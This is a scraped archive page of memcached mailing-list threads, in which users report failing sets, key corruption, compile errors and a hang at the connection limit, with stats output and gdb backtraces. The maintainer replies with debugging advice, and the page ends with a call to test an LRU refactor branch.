  email to memcached+unsubscr...@googlegroups.com.
  For more options, visit https://groups.google.com/d/optout.
 
 

Re: memory efficiency / LRU refactor branch

2015-01-07 Thread dormando
Hey,

To all three of you: Just run it anywhere you can (but not more than one
machine, yet?), with the options prescribed in the PR. Ideally you have
graphs of the hit ratio and maybe cache fullness and can compare
before/after.

And let me know if it hangs or crashes, obviously. If so a backtrace
and/or coredump would be fantastic.

On Thu, 8 Jan 2015, Zhiwei Chan wrote:

   I will deploy it to one of our test environment on CentOS 5.8, for a 
 comparison test with the 1.4.21,  although the workloads is not as heavy as
 product environment. Tell me if any I could help.

 2015-01-07 23:30 GMT+08:00 Eric McConville erichasem...@gmail.com:
   Same here. Do you want any findings posted to the mailing list, or the 
 PU thread?

 On Wed, Jan 7, 2015 at 5:56 AM, Ryan McCullagh m...@ryanmccullagh.com wrote:
   I'm willing to help out in any way possible. What can I do?

   -Original Message-
   From: memcached@googlegroups.com [mailto:memcached@googlegroups.com] On
   Behalf Of dormando
   Sent: Wednesday, January 7, 2015 3:52 AM
   To: memcached@googlegroups.com
   Subject: memory efficiency / LRU refactor branch

   Yo,

   https://github.com/memcached/memcached/pull/97

   Opening to a wider audience. I need some folks willing to poke at it 
 and see
   if their workloads fair better or worse with respect to hit ratios.

   The rest of the work remaining on my end is more testing, and some 
 TODO's
   noted in the PR. The remaining work is relatively small aside from the 
 page
   mover idea. It hasn't been crashing or hanging in my testing so far, but
   that might still happen.

   I can't/won't merge this until I get some evidence that it's useful.
   Hoping someone out there can lend a hand. I don't know what the actual
   impact would be, but for some workloads it could be large. Even for 
 folks
   who have set all items to never expire, it could still potentially 
 improve
   hit ratios by better protecting active items.

   It will work best if you at least have a mix of items with TTL's that 
 expire
   in reasonable amounts of time.

   thanks,
   -Dormando

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



1.4.22

2015-01-01 Thread dormando
https://code.google.com/p/memcached/wiki/ReleaseNotes1422


Re: sets failing, nothing going over the network

2014-12-01 Thread dormando
You may also consider an upgrade sometime...

If the conn tester doesn't pull up much, I don't know what it'd be beyond
things like spaces/newlines/invalid chars sneaking in, or items being too
large. that sort of thing. Cache::Memcached's error reporting is pretty
terrible.

I have a long list of bugs/pull reqs against it that I haven't been
reviewing/merging, if any of you folks are interested in helping there.

On Mon, 1 Dec 2014, Joe Steffee wrote:

 listen_disabled_num doesn't seem to be a likely culprit...

 stats
 STAT pid 11435
 STAT uptime 4457974
 STAT time 1417457018
 STAT version 1.4.5
 STAT pointer_size 64
 STAT rusage_user 19038.393825
 STAT rusage_system 42581.905202
 STAT curr_connections 264
 STAT total_connections 1572308
 STAT connection_structures 402
 STAT cmd_get 658366591
 STAT cmd_set 649621925
 STAT cmd_flush 0
 STAT get_hits 328785935
 STAT get_misses 329580656
 STAT delete_misses 20884653
 STAT delete_hits 100083
 STAT incr_misses 2779284
 STAT incr_hits 44211787
 STAT decr_misses 0
 STAT decr_hits 0
 STAT cas_misses 0
 STAT cas_hits 0
 STAT cas_badval 0
 STAT auth_cmds 0
 STAT auth_errors 0
 STAT bytes_read 12821501027510
 STAT bytes_written 3338632258667
 STAT limit_maxbytes 4294967296
 STAT accepting_conns 1
 STAT listen_disabled_num 0
 STAT threads 4
 STAT conn_yields 441
 STAT bytes 2786601635
 STAT curr_items 5046673
 STAT total_items 48200778
 STAT evictions 0
 STAT reclaimed 30123302
 END


 The web servers are very lightly loaded and have approximately 20GB free 
 memory all the time.

 The utility showed nothing:

 # time ./mc_conn_tester.pl                                                    
                                                                     
        
 Averages: (conn: 0.00045183) (set: 0.00047043) (get: 0.00031982)

 real    53m25.697s
 user    0m17.721s
 sys     0m11.093s

 Even though we saw 14 failures during this time period. Will look more to see 
 if this is a problem on our end

 On Sat, Nov 29, 2014 at 4:46 PM, dormando dorma...@rydia.net wrote:
   Hey,

   http://memcached.org/timeouts - sounds like you've already done some tcp
   dumping, so checking the stats as mentioned in here and running the test
   script a bit should illuminate things a bit.

   On Fri, 21 Nov 2014, kgo...@bepress.com wrote:

A couple months ago, we moved our memcached nodes from a dedicated VM 
 to having one each on our four baremetal web servers
   (mod_perl).
Since we moved, we've been seeing 10-20 failures per hour across our 
 entire environment, where $c-set returns false.
   
I just spend some time with tcpdump and wireshark watching the 
 memcached traffic over port 11211.  The keys that are failing are
   *not* in the
tcpdump, so I'm thinking Cache::Memcached has lost a connection or 
 got a non-functioning socket somehow?
   
Does anything in this scenario give anybody any ideas of what might 
 be going wrong?
   
Each memcached node has about 250 connections at any given time and 
 is handling up to 350 gets/sets per second.  The load on these
   webservers is
around 1 (eight-core boxes). Their total network traffic is about 
 30 Mb/sec, and memcached traffic is about 3 Mb/sec. There's
   nothing in
memcached's logs.
This is debian 6 (squeeze).
   
$ dpkg -l | grep memcached
ii  libcache-memcached-perl                           1.29-1          
              Perl module for using memcached servers
ii  memcached                                         1.4.5-1+deb6u1  
              A high-performance memory object caching system
   
--
   
---
You received this message because you are subscribed to the Google 
 Groups memcached group.
To unsubscribe from this group and stop receiving emails from it, 
 send an email to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.
   
   




 --
 Joe SteffeeLinux Systems Administrator
 bepress

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



Re: Compile fails on Mavericks (Xcode 5 really)

2014-11-29 Thread dormando
Please use a newer source tarball from http://memcached.org/ - this was
fixed ages ago.

On Sat, 29 Nov 2014, vivek verma wrote:

 Hi,
 Can you please specify how to manually remove pthread?
 I don't have certain rights in the system, so can't follow other solutions.
 Thanks

 On Wednesday, October 23, 2013 8:18:35 PM UTC+5:30, Matt Galvin wrote:
   Hello,
 On both Mac OS X 10.8 and the new 10.9 with Xcode 5 memcached fails to 
 compile. Is this a know issue already? Is there a fix in the works
 already?

 ./configure --enable-64bit --with-libevent=/usr/local
 ---

 gcc -v

 Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr
 --with-gxx-include-dir=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk/usr/include/c++/4.2.1

 Apple LLVM version 5.0 (clang-500.2.79) (based on LLVM 3.3svn)

 Target: x86_64-apple-darwin13.0.0

 Thread model: posix

 ---

 gcc -DHAVE_CONFIG_H -I. -DNDEBUG -I/usr/local/include -m64 -g -O2 -pthread 
 -pthread -Wall -Werror -pedantic -Wmissing-prototypes
 -Wmissing-declarations -Wredundant-decls -MT memcached-cache.o -MD -MP -MF 
 .deps/memcached-cache.Tpo -c -o memcached-cache.o `test -f
 'cache.c' || echo './'`cache.c

 mv -f .deps/memcached-cache.Tpo .deps/memcached-cache.Po

 gcc -m64 -g -O2 -pthread -pthread -Wall -Werror -pedantic 
 -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -L/usr/local/lib
 -Wl,-rpath,/usr/local/lib -o memcached memcached-memcached.o memcached-hash.o 
 memcached-slabs.o memcached-items.o memcached-assoc.o
 memcached-thread.o memcached-daemon.o memcached-stats.o memcached-util.o 
 memcached-cache.o -levent

 clang: error: argument unused during compilation: '-pthread'

 clang: error: argument unused during compilation: '-pthread'

 make[2]: *** [memcached] Error 1

 make[1]: *** [all-recursive] Error 1

 make: *** [all] Error 2
 ---

 If I manually remove the -pthread(s) it compiles fine but I'm not sure if 
 that is the correct fix as I've not done any development on
 memcached as of yet.

 Thoughts?

 Thanks,

 Matt

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.




Re: sets failing, nothing going over the network

2014-11-29 Thread dormando
Hey,

http://memcached.org/timeouts - sounds like you've already done some tcp
dumping, so checking the stats as mentioned in here and running the test
script a bit should illuminate things a bit.

On Fri, 21 Nov 2014, kgo...@bepress.com wrote:

 A couple months ago, we moved our memcached nodes from a dedicated VM to 
 having one each on our four baremetal web servers (mod_perl).
 Since we moved, we've been seeing 10-20 failures per hour across our entire 
 environment, where $c-set returns false.

 I just spend some time with tcpdump and wireshark watching the memcached 
 traffic over port 11211.  The keys that are failing are *not* in the
 tcpdump, so I'm thinking Cache::Memcached has lost a connection or got a 
 non-functioning socket somehow?

 Does anything in this scenario give anybody any ideas of what might be going 
 wrong?

 Each memcached node has about 250 connections at any given time and is 
 handling up to 350 gets/sets per second.  The load on these webservers is
 around 1 (eight-core boxes). Their total network traffic is about 30 
 Mb/sec, and memcached traffic is about 3 Mb/sec. There's nothing in
 memcached's logs.
 This is debian 6 (squeeze).

 $ dpkg -l | grep memcached
 ii  libcache-memcached-perl                           1.29-1                  
      Perl module for using memcached servers
 ii  memcached                                         1.4.5-1+deb6u1          
      A high-performance memory object caching system

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



Re: memcached 1.4.13: -remove() sometimes doesn't work

2014-11-29 Thread dormando
Are your sets or any other functions failing sometimes? Are you just more
likely to notice with a delete?

The only issues have always been with the client. Old clients would send
invalid args to the delete command (though it doesn't seem like you're
doing that here). You might just be failing to connect sometimes, double
check http://memcached.org/timeouts for ideas or things to try.

On Wed, 26 Nov 2014, Alexander Kant wrote:

 Hello.

 Currently I'm using memcached 1.4.13.
 Sometimes the -remove() method doesn't work. It looks like that the value 
 stays there.
 I can't say when it exactly doesn't work, but several hundreds times it works 
 as expected: the value will be cached, and can be removed without
 problems - so the code looks really good at that place. But after several 
 hundreds of successfull times, it doesn't remove the value.
 The question is: is/was this a known problem? Does anybody have some ideas?

 I'm usind the Zend Framework.

 Here is the important part of PHP code:

 
 public static function getCache() {
     if (!self::$cache) {
         $options = array(
             'servers' = array(
                 array(
                     'host' = Config::get('cache.memcached.host'),
                     'port' = Config::get('cache.memcached.port'),
                     'persistent' = true,
                     'weight' = 1,
                     'timeout' = 5,
                     'retry_interval' = 15,
                     'status' = true,
                     'default_lifetime' = 3600
                 ),
             ),
         );
         self::$cache = Zend_Cache::factory('Core', 'Memcached',
             array('caching' = true, 'automatic_serialization' = true, 
 'lifetime' = null),
             $options);
     }

     return self::$cache;
 }
 

 
 public function getCountCached($user_id) {
     $cache = System::getCache();
     $cache_id = 'count_values__' . $user_id;

     if ($cache-test($cache_id)) {
         $data = $cache-load($cache_id);
     } else {
         $data = $this-countValues($user_id);
         $cache-save($data, $cache_id, array(), Time::hours(2));
     }

     return (int)$data;
 }
 

 
 public function invalidateCountCache($user_id) {
     $success = false;

     for ($i = 0; $i  5; $i++) {
         if (!$success) {
             $success = System::getCache()-remove('count_values__' . 
 $user_id);
         } else {
             return;
         }
     }
 }
 

 As I somewhere read before: -remove() method also often returns FALSE, also 
 in case of removing was successful.

 I hope somebody have some Idea.

 With best regards,
 Alex

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



Re: Diagnosing Corruption

2014-11-19 Thread dormando
You're probably getting spaces or newlines into your keys, which can cause
the client protocol to desync with the server. Then you'll get all sorts
of junk into random keys (or random responses from keys which're fine).

Either filtering those or using the binary protocol should fix that for
you.

On Wed, 19 Nov 2014, labnext...@gmail.com wrote:

 Hi Boris,
 I think I may have mislead you.  It is not one or two keys that get 
 corrupted, it seems that most (if not all) keys fetched return incorrect data.
  For example during one of these failures (just this morning), a session key 
 (prefixed with session_) returned an array related to a customer
 record (prefixed with lab_), a key related to a customer return a string 
 related to a translation, and a key related to a translation returned

 All heck breaks loose (seemingly) across all keys.  A flush brings things 
 back into the fold.

 Make sense?

 Thanks,

 Mike


 On Wednesday, November 19, 2014 2:22:50 PM UTC-4, Boris wrote:
   I can think of many ways to screw up an application in a way that you 
 describe. Simple programmer error can lead to this sort of
   behavior. I'd just log every time you do a set for that key with value 
 type you are setting.

   On Wed, Nov 19, 2014 at 1:00 PM, labne...@gmail.com wrote:
 Thanks Boris,
 I haven't really given that much thought.  Out of curiosity, why do you think 
 the issue might be on the client end?  I ask, cause I
 really don't have a sense of what to look for on that end and wonder if you 
 might have some suggestions.

 Best,

 Mike


 On Wednesday, November 19, 2014 12:46:16 PM UTC-4, Boris wrote:
   Hi Mike, this sounds to me more like a client/coding error rather than 
 memcached server. That's where I would focus first.
 Boris

 On Wed, Nov 19, 2014 at 11:41 AM, labne...@gmail.com wrote:
   I just had another failure.  After pulling down my apache web servers, 
 and before restarting memcached I grabbed
   stats to see if they showed anything of interest:
  - All 3 servers were reporting for duty following a getServerStatus (PHP 
 client call)
  - curr_connections were listed as 8 across all the instances (apache was 
 down but cron jobs up, so that would have dropped
 things down considerably)
  - listen_disabled_num was listed as 0 across all the instances
  - accepting_conns was listed as 1 across all the instances
  - evictions listed as 0
  - All items across all instances had an evicted and evicted_nonzero and 
 evicted_time value of 0
  - All slabs across all instances had a total_pages value of 1
  - tailrepairs and outofmemory is listed with a value of 0 across all items 
 in each instance
  - global hit rate is 0.9937
  - get_hits is always* greater than cmd_set on a per slab basis.  *One slab 
 reported both values as equal


 As far as I can tell, memcache is reporting that the world is fine and dandy. 
  Should I be enlarging scope of the search to
 look at OS related factors that could result in the client receiving bad 
 data?  None of the machines are dipping into swap.

 Thanks,

 Mike



 On Wednesday, November 19, 2014 9:35:19 AM UTC-4, labne...@gmail.com wrote:
   For what it is worth, I'm hesitant to upgrade memcached to the latest 
 version as a step to try and solve this
   issue.  It seems to me that since our installs have been running 
 without issue for quite some time (close to a
   year), that there are other variables at play here.  I just don't 
 understand the variables.  ;)
 Thanks,

 Mike


 On Tuesday, November 18, 2014 2:00:46 PM UTC-4, labne...@gmail.com wrote:
   Hi There,
 I'm trying to diagnose a new problem with Memcache that seems to be happening 
 with greater frequency.  The
 issue has to do with memcache get requests returning incorrect responses 
 (data from from other keys returned). 
 Restarting or flushing the servers seems to resolve the issue. 

 Do any memcache veterans have any suggestions of how I might dig into this 
 issue?  Stats that I might want to
 trace, log files to look at, etc?  Does maybe this symptom fit the 
 description of any known issues?

 I'm keeping a casual eye on on curr_connections, listen_disabled_num, 
 accepting_conns, bytes, and
 limit_maxbytes (all show nothing unusual).  I've verified that all servers 
 and clients are set up in a
 consistent fashion.  I'm not sure where to go from here to better understand 
 the problem.


 If it helps, I'm running 1.4.13 (ubuntu 12.04 LTS) across 3 servers, 
 connecting in with PHP Memcache 3.0.6


 Tips?

 Mike



  

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this 

Re: memcached-1.4.20 stuck when Too many open connections

2014-11-05 Thread dormando
There're too many things that will go wrong if malloc fails...

There's a stats counter covering some of them. Is that going up for you?

Have you disabled overcommit memory? Have you observed the process size
when it hangs? malloc should almost never actually fail under normal
conditions...

On Wed, 5 Nov 2014, Samdy Sun wrote:

 Hey,  
   I also got a stuck when specifing -m 200. 
   As mentioned previously, that case could happend as below?
   1. malloc fails when conn_new()  2. event_add fails when conn_new()
   3. other case?

   And I find another case after code reviewing. Here is, memcached stuck for 
 a while, for which our client close the connection because
 200ms-timeout. So, if the previous 1023 connections get timeout and memcached 
 calls transmit to write, Broken pipe error will happend. And
 then, memcached get TRANSMIT_HARD_ERROR error and calls conn_close 
 immediately.
   So, it will happend as below?
   accept(), errno == EMFILE
   fd1 close,
   fd2 close,
   fd3 close,
   ……
   fd1023 close,
   accept_new_conns(false) for EMFILE

   That just is a supposition, but I will try to log some infomation to prove 
 it.
   
   Any way, is it better to call conn_close after for a while, such as 
 waiting for next event when getting TRANSMIT_HARD_ERROR error then to
 conn_close immediately?
   

 在 2014年10月31日星期五UTC+8下午3时01分06秒,Dormando写道:
   Hey,

   How are you reproducing this? How many connections do you typically have
   open?

   It's really bizarre that your curr_conns is 5, but your connections 
 are
   disabled? Even if there's still a race, as more connections close they
   each have an opportunity to flip the acceptor back on.

   Can you print what stats settings shows? If it's adjusting your actual
   maxconns downward it should show there...

   On Wed, 29 Oct 2014, Samdy Sun wrote:

There are no deadlocks, (gdb) info thread
* 5 Thread 0xf7771b70 (LWP 24962)  0x080509dd in transmit (fd=431, 
 which=2, arg=0xfef8ce48)
    at memcached.c:4044
  4 Thread 0xf6d70b70 (LWP 24963)  0x007ad430 in __kernel_vsyscall ()
  3 Thread 0xf636fb70 (LWP 24964)  0x007ad430 in __kernel_vsyscall ()
  2 Thread 0xf596eb70 (LWP 24965)  0x007ad430 in __kernel_vsyscall ()
  1 Thread 0xf77b38d0 (LWP 24961)  0x007ad430 in __kernel_vsyscall ()
(gdb) t 1
[Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005c5366 in epoll_wait () from /lib/libc.so.6
#2  0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, 
 tv=0xff8e0cdc) at epoll.c:198
#3  0x0073d714 in event_base_loop (base=0x9305008, flags=0) at 
 event.c:538
#4  0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795
(gdb) 
   
(gdb) t 2
[Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
#2  0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 3
[Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005838b6 in nanosleep () from /lib/libc.so.6
#2  0x005836e0 in sleep () from /lib/libc.so.6
#3  0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819
#4  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#5  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 4
[Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
#2  0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 5
[Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a68998 in sendmsg () from /lib/libpthread.so.0
#2  0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4044
#3  drive_machine (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4370
#4  event_handler (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4441
#5  0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at 
 event.c:395
#6  event_base_loop (base=0x9310658, flags=0

Re: memcached-1.4.20 stuck when Too many open connections

2014-10-31 Thread dormando
Hey,

How are you reproducing this? How many connections do you typically have
open?

It's really bizarre that your curr_conns is 5, but your connections are
disabled? Even if there's still a race, as more connections close they
each have an opportunity to flip the acceptor back on.

Can you print what stats settings shows? If it's adjusting your actual
maxconns downward it should show there...

On Wed, 29 Oct 2014, Samdy Sun wrote:

 There are no deadlocks, (gdb) info thread
 * 5 Thread 0xf7771b70 (LWP 24962)  0x080509dd in transmit (fd=431, which=2, 
 arg=0xfef8ce48)
     at memcached.c:4044
   4 Thread 0xf6d70b70 (LWP 24963)  0x007ad430 in __kernel_vsyscall ()
   3 Thread 0xf636fb70 (LWP 24964)  0x007ad430 in __kernel_vsyscall ()
   2 Thread 0xf596eb70 (LWP 24965)  0x007ad430 in __kernel_vsyscall ()
   1 Thread 0xf77b38d0 (LWP 24961)  0x007ad430 in __kernel_vsyscall ()
 (gdb) t 1
 [Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x005c5366 in epoll_wait () from /lib/libc.so.6
 #2  0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, 
 tv=0xff8e0cdc) at epoll.c:198
 #3  0x0073d714 in event_base_loop (base=0x9305008, flags=0) at event.c:538
 #4  0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795
 (gdb) 

 (gdb) t 2
 [Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
 #2  0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859
 #3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #4  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) t 3
 [Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x005838b6 in nanosleep () from /lib/libc.so.6
 #2  0x005836e0 in sleep () from /lib/libc.so.6
 #3  0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819
 #4  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #5  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) t 4
 [Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
 #2  0x080599f5 in assoc_maintenance_thread (arg=0x0) at assoc.c:251
 #3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #4  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) t 5
 [Switching to thread 5 (Thread 0xf7771b70 (LWP 24962))]#0  0x007ad430 in 
 __kernel_vsyscall ()
 (gdb) bt
 #0  0x007ad430 in __kernel_vsyscall ()
 #1  0x00a68998 in sendmsg () from /lib/libpthread.so.0
 #2  0x080509dd in transmit (fd=431, which=2, arg=0xfef8ce48) at 
 memcached.c:4044
 #3  drive_machine (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4370
 #4  event_handler (fd=431, which=2, arg=0xfef8ce48) at memcached.c:4441
 #5  0x0073d9e4 in event_process_active (base=0x9310658, flags=0) at 
 event.c:395
 #6  event_base_loop (base=0x9310658, flags=0) at event.c:547
 #7  0x08059fee in worker_libevent (arg=0x930c698) at thread.c:471
 #8  0x00a61a49 in start_thread () from /lib/libpthread.so.0
 #9  0x005c4aee in clone () from /lib/libc.so.6
 (gdb) 

 strace info, there is the only event named maxconnsevent on epoll?
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 10084037}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 20246365}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 30382098}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 40509766}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 50657403}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 60823841}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 71013006}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 81234264}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 91407508}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 101581187}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 111752457}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 121919049}) = 0
 epoll_wait(4, {}, 32, 10)               = 0
 clock_gettime(CLOCK_MONOTONIC, {8374269, 132057597}) = 0



 在 2014年10月29日星期三UTC+8下午2时47分23秒,Samdy Sun写道:
   Hello,  I got a memcached-1.4.20 stuck problem when EMFILE happen.
   Here are my memcached's cmdline memcached -s /xxx/mc_usock.11201 -c 1024 
 -m 4000 -f 

Re: memcached-1.4.20 stuck when Too many open connections

2014-10-31 Thread dormando
Hey,

32-bit memcached with -m 4000 will never work. the best you can do is
probably -m 1600. 32bit applications typically can only allocate up to 2G
of ram.

memcached isn't protected from a lot of malloc failure scenarios, so what
you're doing will never work.

-m 4000 only limits the slab memory usage. there're a lot of buffers/etc
outside of that. Also the hash table, which is measured separately.

On Fri, 31 Oct 2014, Samdy Sun wrote:

 @Dormando,  
   I try my best to reproduce this in my environment, but failed. This just 
 happened on my servers. 

   I use stats command to check the memcached if it is available or not. If 
 the memcached is unavailable, we will not send request to it. 

   This is what I feel strange when my curr_conns is 5 and memcached can't 
 recover itself. I think conn_new call maybe fail, and it call
 close(fd) directly, not conn_close()? Such as below?

   1. malloc fails when conn_new()
   2. event_add fails when conn_new()
   3. other case?

   Take notice of that I build memcached on 32-bit system and it runs on 
 64-bit system. Additionally, I use -m 4000 for memcached's start.

   Thanks,
   Samdy Sun

 在 2014年10月31日星期五UTC+8下午3时01分06秒,Dormando写道:
   Hey,

   How are you reproducing this? How many connections do you typically have
   open?

   It's really bizarre that your curr_conns is 5, but your connections 
 are
   disabled? Even if there's still a race, as more connections close they
   each have an opportunity to flip the acceptor back on.

   Can you print what stats settings shows? If it's adjusting your actual
   maxconns downward it should show there...

   On Wed, 29 Oct 2014, Samdy Sun wrote:

There are no deadlocks, (gdb) info thread
* 5 Thread 0xf7771b70 (LWP 24962)  0x080509dd in transmit (fd=431, 
 which=2, arg=0xfef8ce48)
    at memcached.c:4044
  4 Thread 0xf6d70b70 (LWP 24963)  0x007ad430 in __kernel_vsyscall ()
  3 Thread 0xf636fb70 (LWP 24964)  0x007ad430 in __kernel_vsyscall ()
  2 Thread 0xf596eb70 (LWP 24965)  0x007ad430 in __kernel_vsyscall ()
  1 Thread 0xf77b38d0 (LWP 24961)  0x007ad430 in __kernel_vsyscall ()
(gdb) t 1
[Switching to thread 1 (Thread 0xf77b38d0 (LWP 24961))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005c5366 in epoll_wait () from /lib/libc.so.6
#2  0x0074a750 in epoll_dispatch (base=0x9305008, arg=0x93053c0, 
 tv=0xff8e0cdc) at epoll.c:198
#3  0x0073d714 in event_base_loop (base=0x9305008, flags=0) at 
 event.c:538
#4  0x08054467 in main (argc=19, argv=0xff8e2274) at memcached.c:5795
(gdb) 
   
(gdb) t 2
[Switching to thread 2 (Thread 0xf596eb70 (LWP 24965))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
#2  0x08055662 in slab_rebalance_thread (arg=0x0) at slabs.c:859
#3  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#4  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 3
[Switching to thread 3 (Thread 0xf636fb70 (LWP 24964))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x005838b6 in nanosleep () from /lib/libc.so.6
#2  0x005836e0 in sleep () from /lib/libc.so.6
#3  0x08056f6e in slab_maintenance_thread (arg=0x0) at slabs.c:819
#4  0x00a61a49 in start_thread () from /lib/libpthread.so.0
#5  0x005c4aee in clone () from /lib/libc.so.6
(gdb) t 4
[Switching to thread 4 (Thread 0xf6d70b70 (LWP 24963))]#0  0x007ad430 
 in __kernel_vsyscall ()
(gdb) bt
#0  0x007ad430 in __kernel_vsyscall ()
#1  0x00a652bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib/libpthread.so.0
